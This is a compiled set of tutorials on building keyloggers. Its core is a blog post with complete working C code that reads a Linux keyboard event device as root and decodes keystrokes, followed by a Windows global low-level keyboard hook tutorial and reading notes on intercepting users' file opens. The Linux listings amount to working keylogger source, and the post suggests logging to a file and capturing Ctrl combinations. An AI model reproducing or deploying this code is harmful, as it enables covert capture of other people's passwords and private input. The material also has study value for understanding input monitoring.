Writing a Linux Keylogger in C


Source: http://samvh.nl/security/writing-a-linux-keylogger-in-c/



Today we are going to write a Linux keylogger in C. We can do this by reading from the keyboard's event device under /dev. Those device nodes are normally readable only by root (on many distributions also by members of the input group), so the program has to run with root rights.

Warning: this keylogger is meant only for educational purposes. I’m not responsible for any damage made by this program.

Reading from the device

First of all, we need to know which device node under /dev to use; this differs from machine to machine. I already know it is under /dev/input. In that folder there are several devices whose names start with "event". We could open each of them with something like cat and look whether anything appears after hitting a key, but there is an easier way. The file /proc/bus/input/devices lists every eventX node together with the name of the device it belongs to, so we can read this file with cat and search for the keyboard. An entry in /proc/bus/input/devices looks like this:

The word starting with "event" on the "Handlers=" line is the eventX device of that entry; for my keyboard it is the third word, event3, so I will be using that in this blog post. If we read from /dev/input/event3 (with root rights ;)), we get a stream of binary input_event records carrying key codes (strictly speaking these are Linux key codes, not raw hardware scancodes: the kernel has already translated those). In the C program, we will be translating those key codes to ASCII.
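The lookup described above, as an added example that is not the post author's code: it parses the text of /proc/bus/input/devices stanza by stanza and picks the first device whose "B: EV=" capability mask contains both EV_KEY and EV_REP (keys plus auto-repeat). Matching only the word "kbd" in the Handlers= line is not enough, because the Power Button entry also has a kbd handler, and the eventX token is not always the third word, so the parser searches for it instead. The sample text is constructed in the file's format, not a dump from a real machine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Bits of the "B: EV=" capability mask (EV_KEY = 0x01, EV_REP = 0x14 in linux/input-event-codes.h).
 * A keyboard reports keys and auto-repeat; the Power Button (also a "kbd" handler) and mice do not. */
#define EV_KEY_BIT (1UL << 0x01)
#define EV_REP_BIT (1UL << 0x14)

/* Constructed sample in the format of /proc/bus/input/devices (not a dump from a real machine). */
const char sample_devices[] =
    "I: Bus=0019 Vendor=0000 Product=0001 Version=0000\n"
    "N: Name=\"Power Button\"\n"
    "H: Handlers=kbd event0\n"
    "B: EV=3\n"
    "\n"
    "I: Bus=0003 Vendor=0000 Product=0000 Version=0000\n"
    "N: Name=\"USB Optical Mouse\"\n"
    "H: Handlers=mouse0 event2\n"
    "B: EV=17\n"
    "\n"
    "I: Bus=0011 Vendor=0001 Product=0001 Version=ab41\n"
    "N: Name=\"AT Translated Set 2 keyboard\"\n"
    "H: Handlers=sysrq kbd event3 leds\n"
    "B: EV=120013\n"
    "\n";

static int stanza_is_keyboard(const char *event_name, unsigned long ev_bits)
{
    return event_name[0] != '\0' &&
           (ev_bits & (EV_KEY_BIT | EV_REP_BIT)) == (EV_KEY_BIT | EV_REP_BIT);
}

/* Scan the stanzas and return the eventN handler of the first keyboard-like device
 * (pointer to a static buffer), or NULL if none matches. */
const char *find_keyboard_event(const char *text)
{
    static char found[32];
    char event_name[32] = "";
    unsigned long ev_bits = 0;
    const char *line = text;

    for (;;) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);

        if (len == 0) {                                   /* blank line or end of text: stanza complete */
            if (stanza_is_keyboard(event_name, ev_bits)) { strcpy(found, event_name); return found; }
            event_name[0] = '\0';
            ev_bits = 0;
        } else if (strncmp(line, "H: Handlers=", 12) == 0) {
            const char *p = strstr(line, "event");        /* the eventN token, wherever it sits */
            if (p && p < line + len) {
                size_t n = 0;
                while (n < len - (size_t)(p - line) && p[n] != ' ' && n < sizeof event_name - 1) {
                    event_name[n] = p[n];
                    n++;
                }
                event_name[n] = '\0';
            }
        } else if (strncmp(line, "B: EV=", 6) == 0) {
            ev_bits = strtoul(line + 6, NULL, 16);        /* hexadecimal, e.g. 120013 */
        }
        if (!nl) break;
        line = nl + 1;
    }
    /* text without a trailing blank line: judge the last stanza too */
    if (stanza_is_keyboard(event_name, ev_bits)) { strcpy(found, event_name); return found; }
    return NULL;
}

int main(void)
{
    static char buf[1 << 16];
    FILE *f = fopen("/proc/bus/input/devices", "r");
    size_t n;
    const char *ev;

    if (!f) { perror("/proc/bus/input/devices"); return 1; }
    n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    ev = find_keyboard_event(buf);
    if (!ev) { fputs("no keyboard-like device found\n", stderr); return 1; }
    printf("/dev/input/%s\n", ev);
    return 0;
}
```

A machine with several keyboards (a laptop's built-in one plus a USB one) has several matching stanzas; this picks the first, so on such a machine print all matches instead of stopping at one.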

 

The program

We need the following includes:

After that, we define the constant UK, so we don't have to write "[Unknown]" every time a key code has no key on the keyboard layout:

Then we make a keyboard layout, like the following:

Also, we make a keyboard layout for whenever the capslock key is pressed and whenever the shift key is pressed:

Then we define a main function, with some variables and a while loop.

O_RDONLY means we open the file read-only. input_event is a struct defined in linux/input.h:

 

In the while loop, we read one record from fd into ev. When ev.type is equal to 1 (EV_KEY), two if statements check whether ev.value says the key was pressed (1) or released (0) and print the key. A value of 2 means auto-repeat.

ev.code is the key code as a decimal number (the KEY_* constants in linux/input-event-codes.h); the raw hardware scancode is reported separately in EV_MSC/MSC_SCAN records.

The program will now work, but Shift and Caps Lock won't make keys uppercase yet. So, in the first if statement we check whether the pressed key is Caps Lock. If it is, we check whether caps_pressed is already 1; if so we set it to 0, otherwise we set it to 1. We also check whether Shift has been pressed; if so, we set shift_pressed to 1, and whenever Shift is released we set it back to 0. The key codes for [RShift], [LShift] and [CapsLock] are 54, 42 and 58, respectively. Also, each time a key is released, we print a newline. You can find the final code in my GitHub repository: https://github.com/samvhb/Linux-Keylogger.
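The whole program as described in the steps above, written here as an added example; it is not the code from the author's GitHub repository. It assumes a US layout and only maps key codes 0..58 (the main block of the keyboard). Unlike the two separate Shift and Caps Lock layouts the post describes, it combines the modifiers: Caps Lock flips letters only, and Shift cancels it, so Shift+b with Caps Lock on gives a lowercase b. The decoder is separated from the read loop so it can be run over a constructed event stream; decode_sample builds such a stream, which is not a capture from a real device.

```c
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#ifdef __linux__
#include <linux/input.h>   /* struct input_event, EV_KEY and the KEY_* key codes */
#else
/* Non-Linux hosts: a copy of the kernel's record layout and the few codes used below,
 * so the decoding logic still compiles; the device node itself only exists on Linux. */
#include <sys/time.h>
struct input_event { struct timeval time; unsigned short type, code; int value; };
enum { EV_KEY = 1, KEY_1 = 2, KEY_I = 23, KEY_A = 30, KEY_H = 35, KEY_LEFTSHIFT = 42,
       KEY_B = 48, KEY_RIGHTSHIFT = 54, KEY_CAPSLOCK = 58 };
#endif

/* US layout indexed by key code 0..58; 0 marks a key without a printable character. */
static const char lower_map[] = {
    0, 0, '1','2','3','4','5','6','7','8','9','0','-','=', '\b','\t',
    'q','w','e','r','t','y','u','i','o','p','[',']','\n', 0,
    'a','s','d','f','g','h','j','k','l',';','\'','`', 0, '\\',
    'z','x','c','v','b','n','m',',','.','/', 0, '*', 0, ' ', 0 };
static const char upper_map[] = {
    0, 0, '!','@','#','$','%','^','&','*','(',')','_','+', '\b','\t',
    'Q','W','E','R','T','Y','U','I','O','P','{','}','\n', 0,
    'A','S','D','F','G','H','J','K','L',':','"','~', 0, '|',
    'Z','X','C','V','B','N','M','<','>','?', 0, '*', 0, ' ', 0 };

/* Caps Lock flips letters only, and Shift cancels it; Shift alone shifts every key. */
char key_to_char(unsigned code, int shift, int caps)
{
    char lo = code < sizeof lower_map ? lower_map[code] : 0;
    char up = code < sizeof upper_map ? upper_map[code] : 0;
    int letter = (lo >= 'a' && lo <= 'z');
    return (letter ? (shift != caps) : shift) ? up : lo;
}

struct key_state { int lshift, rshift, caps; };

/* Run EV_KEY records through the modifier state machine, append the printable
 * characters to out (NUL-terminated) and return how many were produced. */
size_t decode_key_events(const struct input_event *ev, size_t n, struct key_state *st,
                         char *out, size_t cap)
{
    size_t len = 0, i;
    for (i = 0; i < n; i++) {
        int pressed = ev[i].value != 0;       /* value: 0 = release, 1 = press, 2 = auto-repeat */
        char c;
        if (ev[i].type != EV_KEY) continue;   /* EV_SYN, EV_MSC and EV_LED records carry no key */
        if (ev[i].code == KEY_LEFTSHIFT)  { st->lshift = pressed; continue; }
        if (ev[i].code == KEY_RIGHTSHIFT) { st->rshift = pressed; continue; }
        if (ev[i].code == KEY_CAPSLOCK)   { if (ev[i].value == 1) st->caps ^= 1; continue; }
        if (!pressed) continue;
        c = key_to_char(ev[i].code, st->lshift || st->rshift, st->caps);
        if (c && len + 1 < cap) out[len++] = c;
    }
    out[len] = '\0';
    return len;
}

static struct input_event kev(unsigned short code, int value)
{
    struct input_event e;
    memset(&e, 0, sizeof e); e.type = EV_KEY; e.code = code; e.value = value;
    return e;
}

/* Constructed event stream, not captured from a device: h, Shift+i, Caps Lock, a, 1, Shift+b, Shift+1. */
const char *decode_sample(void)
{
    static char out[32];
    struct key_state st = {0, 0, 0};
    struct input_event evs[18];
    int i = 0;
    evs[i++] = kev(KEY_H, 1);         evs[i++] = kev(KEY_H, 0);
    evs[i++] = kev(KEY_LEFTSHIFT, 1); evs[i++] = kev(KEY_I, 1); evs[i++] = kev(KEY_I, 0);
    evs[i++] = kev(KEY_LEFTSHIFT, 0); evs[i++] = kev(KEY_CAPSLOCK, 1); evs[i++] = kev(KEY_CAPSLOCK, 0);
    evs[i++] = kev(KEY_A, 1);         evs[i++] = kev(KEY_A, 0);
    evs[i++] = kev(KEY_1, 1);         evs[i++] = kev(KEY_1, 0);
    evs[i++] = kev(KEY_LEFTSHIFT, 1); evs[i++] = kev(KEY_B, 1); evs[i++] = kev(KEY_B, 0);
    evs[i++] = kev(KEY_1, 1);         evs[i++] = kev(KEY_1, 0); evs[i++] = kev(KEY_LEFTSHIFT, 0);
    decode_key_events(evs, (size_t)i, &st, out, sizeof out);
    return out;                        /* "hIA1b!" */
}

int main(int argc, char **argv)
{
    struct key_state st = {0, 0, 0};
    struct input_event ev;
    char c[2];
    int fd;
    if (argc != 2) { fprintf(stderr, "usage: %s /dev/input/eventN\n", argv[0]); return 1; }
    fd = open(argv[1], O_RDONLY);      /* needs root, or membership of the group that owns the node */
    if (fd < 0) { perror(argv[1]); return 1; }
    for (;;) {                         /* evdev hands out whole records, never partial ones */
        if (read(fd, &ev, sizeof ev) != (ssize_t)sizeof ev) break;
        if (decode_key_events(&ev, 1, &st, c, sizeof c)) { fputs(c, stdout); fflush(stdout); }
    }
    close(fd);
    return 0;
}
```

Run it as root with the event node found earlier, e.g. ./keylog /dev/input/event3. Reading the record with a single read() of sizeof(struct input_event) is safe because evdev never returns a partial record, but the struct layout must match the running kernel, which is why the Linux build takes it from linux/input.h rather than a hand-written copy.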

Next

You can add a key code list for when CTRL is held, so that combinations like CTRL+C and CTRL+S are logged. You can also write the keys to a log file.

If you have questions, suggestions or anything like that, make sure to comment :).

 

– Sam

 

 

Posted on August 29, 2015. Categories: Security. Tags: c, keylogger, linux, malware, programming, security, unix, virus




=================== Windows keylogger ===================

Source: http://www.haseeb-ahmed.com/2015/02/global-windows-hook-in-visual-c/

Using global windows hook in Visual C++


Since you are here, you probably know what a Windows hook is and what it can be used for. I say this because this isn't exactly a beginner topic. Nonetheless, let's get ourselves familiar with hooks before we get started. Here is how the MSDN documentation describes a Windows hook:

A hook is a mechanism by which an application can intercept events, such as messages, mouse actions, and keystrokes. A function that intercepts a particular type of event is known as a hook procedure.

For the sake of simplicity, you can think of hooks as Windows' global events and hook procedures as your event handlers for them. Many might disagree with my analogy, and I agree that it's not the best, but still, it gets the job done.

Before we can implement a Windows hook, you need to make sure that you have at least a basic understanding of the C++ programming language. If you don't, I would recommend that you go and check out this free course at the Microsoft Virtual Academy before you continue any further.

How-to implement Windows hook

Now that we have the brief introduction and prerequisites out of the way, we can start implementing hooks in C++. I will be using Microsoft's Visual Studio 2013, but this code should build in pretty much any C++ IDE. Also, I will only be implementing the WH_KEYBOARD_LL hook, which receives low-level keyboard input events. This is mainly for two reasons:

  • WH_KEYBOARD_LL hook is easy to implement and understand.
  • Other types of hooks have an almost identical implementation.

Start off using an empty console project and add the following lines of code to your Source.cpp file.

We have included iostream and Windows.h in our program. You probably know what iostream is for; Windows.h declares the functions needed to install and uninstall a Windows hook. The #pragma comment(lib, "user32.lib") directive tells the MSVC linker to link user32.lib, the library that exports those functions.

The while statement on line #7 puts the program in a message loop and keeps it alive. We need this because a hook is uninstalled when the thread that installed it exits, and a low-level hook procedure is only called while that thread pumps messages; without the loop, our program would exit immediately after starting.

Now, add the following lines of code just above the declaration of our program’s main method.

First, we declare and initialize a variable of type HHOOK. This is a handle that gets set once the hook has been installed. MyLowLevelKeyboardProc() is the event handler (or hook procedure) that runs whenever the respective Windows global event (or hook) is triggered. CallNextHookEx() passes the event on to the next hook procedure in the chain and returns that procedure's result. If you don't do this, the hook procedures of other applications installed after yours never see the event, which might cause those applications to behave irregularly. You can read more about LowLevelKeyboardProc() and its arguments in the MSDN documentation.

We have done most of the work by now. The basic structure of our  C++ program is ready. We have defined the LowLevelKeyboardProc() hook procedure. Now all that is left is to install the hook so that we can start receiving our low-level keyboard events.

To do that, add the following code just above the while loop, into the main function of your program.

What this does is install our MyLowLevelKeyboardProc() into the WH_KEYBOARD_LL hook and store the returned handle in hHook. If SetWindowsHookEx() fails for some reason, hHook is NULL and the error is displayed in the console window.

Your complete program should now look something like this.

That's it. Run your program (Ctrl + F5), click on the taskbar and press some keys on the keyboard. You should see something like the screenshot below.

[Screenshot: Using global windows hook in Visual C++]

In my experience, those are all the basics you need to know about how to implement hooks in C++. Still, if you have any further questions, please feel free to ask. I'll try my best to answer them.

You can download the final source code from my Codeplex project. Meanwhile, also check out some more recommended resources given below.


############## Reading notes ################

On Linux, the keylogger works by reading the input device file /dev/xxxx.

On Windows, it works through hooks.

By listening for system-wide keyboard events or mouse-click events, you can do some interesting things.

For example, when the user double-clicks a *.doc file, we can first process that file and only then open it for the user.

